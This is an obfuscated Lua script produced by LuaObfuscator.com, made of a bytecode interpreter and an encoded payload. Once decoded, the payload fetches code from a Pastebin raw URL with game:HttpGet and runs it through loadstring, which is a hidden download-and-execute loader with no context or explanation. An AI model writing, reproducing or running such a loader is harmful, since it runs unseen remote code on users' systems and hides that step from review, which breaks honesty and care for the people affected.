--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v125=v5(v87,v19);v19=nil;return v125;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0 -0 ;local v89;while true do if ((0 -0)==v88) then v89=(v31/(((880 -(282 + 595)) -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + (1701 -(1523 + 114))))) -(v32-1)) + (932 -(857 + 74)))) ;return v89-(v89%(569 -(367 + 201))) ;end end else local v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v37=118 -(24 + 8 + 85) ;end if (v37==(1 + (0 -0))) then return (v41 * (16777566 -(87 + 263))) + (v40 * ((15485 -(802 + 150)) + 51003)) + (v39 * (1213 -(892 + (159 -94)))) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=(7 -5) -1 ;local v45=(v20(v43,19 -(10 + 8) ,36 -16 ) * ((2 + 0)^(1029 -((2254 -1339) + 82)))) + v42 ;local v46=v20(v43,59 -38 ,54 -23 );local v47=((v20(v43,19 + 13 )==(439 -(145 + 293))) and  -1) or (1 -0) ;if (v46==(1187 -(1069 + (977 -(814 + 45))))) then if (v45==(1486 -(998 + 488))) then return v47 * ((0 + 0) -0) ;else v46=1 -0 ;v44=0 + 0 ;end elseif (v46==(2819 -(201 + 571))) then return ((v45==((403 + 735) -(116 + 1022))) and (v47 * ((1 -(885 -(261 + 624)))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(601 + 422) ) * (v44 + (v45/((793 -(368 + 423))^((289 -126) -111)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1080 -(1020 + 60))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1424 -(630 + 793)) );v18=v18 + v48 ;local v50={};for v67=1, #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==0) then local v121=(function() return 0;end)();while true do if (0~=v121) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v121=(function() return 868 -(550 + 317) ;end)();end if (1==v121) then v91=(function() return  #"[";end)();break;end end end if (v91== #"{") then if (v92== #"<") then v94=(function() return v93()~=(0 -0) ;end)();elseif (v92==(2 -0)) then v94=(function() return v95();end)();elseif (v92~= #"xnx") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0 -0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==0) then local v123=(function() return 0;end)();while true do if (v123==(286 -(134 + 151))) then v108=(function() return 1;end)();break;end if (v123==0) then v99=(function() return 1665 -(970 + 695) ;end)();v100=(function() return nil;end)();v123=(function() return 1 -0 ;end)();end end end if (1==v108) then local v124=(function() return 0;end)();while true do if (v124==0) then while true do if (v99~=(1990 -(582 + 1408))) then else v100=(function() return v101();end)();if (v102(v100, #"}", #"}")==(0 -0)) then local v162=(function() return 0;end)();local v163=(function() return;end)();local v164=(function() return;end)();local v165=(function() return;end)();local v166=(function() return;end)();while true do if (v162==1) then local v174=(function() return 0;end)();while true do if (v174~=0) then else v165=(function() return nil;end)();v166=(function() return nil;end)();v174=(function() return 1 -0 ;end)();end if (v174==(3 -2)) then v162=(function() return 2;end)();break;end end end if (v162==2) then while true do if (v163==(1826 -(1195 + 629))) then local v179=(function() return 0 -0 ;end)();local v180=(function() return;end)();while true do if (v179==0) then v180=(function() return 241 -(187 + 54) ;end)();while true do if (0==v180) then if (v102(v165, #"{", #"}")~= #",") then else v166[782 -(162 + 618) ]=(function() return v103[v166[2 + 0 ]];end)();end if (v102(v165,2,2 + 0 )== #"\\") then v166[ #"19("]=(function() return v103[v166[ #"19("]];end)();end v180=(function() return 1 -0 ;end)();end if (v180~=(1 -0)) then else v163=(function() return  #"xxx";end)();break;end end break;end end end if (v163==0) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181==(0 + 0)) then v182=(function() return 0;end)();while true do if (v182==(1636 -(1373 + 263))) then v164=(function() return v102(v100,2, #"xnx");end)();v165=(function() return v102(v100, #"http",1006 -(451 + 549) );end)();v182=(function() return 1 + 0 ;end)();end if (v182==(1 -0)) then v163=(function() return  #"}";end)();break;end end break;end end end if (v163~= #",") then else local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if (v183==0) then v184=(function() return 1384 -(746 + 638) ;end)();while true do if (v184==(1 + 0)) then v163=(function() return 2 -0 ;end)();break;end if (v184~=(341 -(218 + 123))) then else v166=(function() return {v104(),v104(),nil,nil};end)();if (v164==0) then local v189=(function() return 0 + 0 ;end)();local v190=(function() return;end)();while true do if (0==v189) then v190=(function() return 0 + 0 ;end)();while true do if (v190==(560 -(306 + 254))) then v166[ #"gha"]=(function() return v104();end)();v166[ #"?id="]=(function() return v104();end)();break;end end break;end end elseif (v164== #"|") then v166[ #"xxx"]=(function() return v105();end)();elseif (v164==2) then v166[ #"91("]=(function() return v105() -(2^16) ;end)();elseif (v164== #"-19") then local v195=(function() return 0 + 0 ;end)();while true do if (v195==(0 -0)) then v166[ #"91("]=(function() return v105() -((1469 -(899 + 568))^16) ;end)();v166[ #"xnxx"]=(function() return v104();end)();break;end end end v184=(function() return 1;end)();end end break;end end end if (v163== #"xxx") then if (v102(v165, #"91(", #"-19")~= #"/") then else v166[ #"asd1"]=(function() return v103[v166[ #"xnxx"]];end)();end v106[v107]=(function() return v166;end)();break;end end break;end if (v162~=(0 + 0)) then else local v175=(function() return 0;end)();local v176=(function() return;end)();while true do if (v175~=(0 -0)) then else v176=(function() return 603 -(268 + 335) ;end)();while true do if (v176==0) then v163=(function() return 0;end)();v164=(function() return nil;end)();v176=(function() return 291 -(60 + 230) ;end)();end if (v176==1) then v162=(function() return 573 -(426 + 146) ;end)();break;end end break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if (v112~=(0 + 0)) then else v113=(function() return 0;end)();while true do if (v113~=(1456 -(282 + 1174))) then else local v126=(function() return 0;end)();while true do if (v126==(811 -(569 + 242))) then v109[v110-#"|" ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do FlatIdent_475BC,Type,v21,Cons,v24,v25,v59,v69=(function() return v51(FlatIdent_475BC,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"nil"]=(function() return v21();end)();for v70= #"]",v23() do FlatIdent_77C29,Descriptor,v21,v20,v59,v22,v23,v54,v70=(function() return v52(FlatIdent_77C29,Descriptor,v21,v20,v59,v22,v23,v54,v70);end)();end for v71= #"[",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2];local v66=v61[1 + 2 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=414 -(15 + 398) ;local v77= -((771 + 254) -(706 + 318));local v78={};local v79={...};local v80=v12("#",...) -(1272 -(945 + 271 + 55)) ;local v81={};local v82={};for v114=0 -0 ,v80 do if (v114>=v74) then v78[v114-v74 ]=v79[v114 + 1 + 0 ];else v82[v114]=v79[v114 + 1 + 0 ];end end local v83=(v80-v74) + (701 -(271 + 429)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if ((v85<=(1506 -(1408 + 92))) or (142>=4749)) then if ((3926<=4134) and (4157>1889) and (v85<=(1088 -(461 + 625)))) then if ((v85<=(1288 -(993 + 126 + 169))) or (164>=2785)) then v82[v84[(1505 -(363 + 1141)) + 1 ]]=v63[v84[1174 -(418 + 753) ]];elseif (v85>(1581 -(1183 + 397))) then local v134=0 + 0 ;local v135;while true do if ((v134==(0 + 0)) or (1912>2982)) then v135=v84[1 + 1 ];v82[v135]=v82[v135](v13(v82,v135 + 1 ,v77));break;end end else do return;end end elseif (v85<=(2 + 2)) then if ((647<=3287) and (v85>((1619 -1087) -(298 + 108 + 123)))) then do return;end else v82[v84[1771 -(1749 + 20) ]]();end elseif (v85>5) then local v136=0 + 0 + 0 ;local v137;while true do if (v136==(0 -0)) then v137=v84[1324 -(1249 + 73) ];v82[v137]=v82[v137](v13(v82,v137 + 1 + 0 ,v77));break;end end else local v138=v84[2];local v139,v140=v75(v82[v138](v13(v82,v138 + ((2353 -(1913 + 62)) -(142 + 235)) ,v84[1148 -(466 + 679) ])));v77=(v140 + v138) -(2 -1) ;local v141=0 + 0 ;for v159=v138,v77 do v141=v141 + ((2 + 0) -1) ;v82[v159]=v139[v141];end end elseif (v85<=(986 -(553 + 424))) then if ((v85<=((34 -21) -6)) or (525==2109)) then local v129=v84[2];local v130=v82[v84[1903 -(106 + 1794) ]];v82[v129 + 1 + 0 ]=v130;v82[v129]=v130[v84[2 + (1935 -(565 + 1368)) ]];elseif (v85==(5 + 3)) then v82[v84[5 -3 ]]();else local v142=0 -0 ;local v143;local v144;local v145;local v146;while true do if (v142==(114 -(4 + 110))) then v143=v84[586 -((214 -157) + (2188 -(1477 + 184))) ];v144,v145=v75(v82[v143](v13(v82,v143 + (1428 -((55 -14) + 1386)) ,v84[6 -(3 + 0) ])));v142=104 -(17 + 86) ;end if (v142==(1 + 0)) then v77=(v145 + v143) -(754 -(239 + 514)) ;v146=0 -0 ;v142=5 -3 ;end if ((33==33) and (v142==(168 -(122 + 44)))) then for v172=v143,v77 do local v173=(856 -(564 + 292)) + 0 ;while true do if (v173==(0 -(0 -0))) then v146=v146 + (3 -2) ;v82[v172]=v144[v146];break;end end end break;end end end elseif (v85<=((26 -17) + 2)) then if (v85==(2 + 8)) then v82[v84[3 -1 ]]=v84[1133 -(369 + 761) ];else v82[v84[(371 -(244 + 60)) -(30 + 27 + 8) ]]=v84[(481 -(41 + 435)) -2 ];end elseif ((3054<=4015) and ((v85==(9 + 3)) or (2318>=4800))) then local v151=v84[1259 -(1043 + 214) ];local v152=v82[v84[3]];v82[v151 + (239 -(64 + 174)) ]=v152;v82[v151]=v152[v84[15 -11 ]];else v82[v84[1214 -(323 + 889) ]]=v63[v84[(1008 -(938 + 63)) -4 ]];end v76=v76 + (581 -(361 + 219)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F644E695A7351753100083Q00124Q00013Q00122Q000100023Q00200700010001000300120A000300044Q0005000100034Q00065Q00022Q00083Q000100012Q00043Q00017Q00",v9(),...);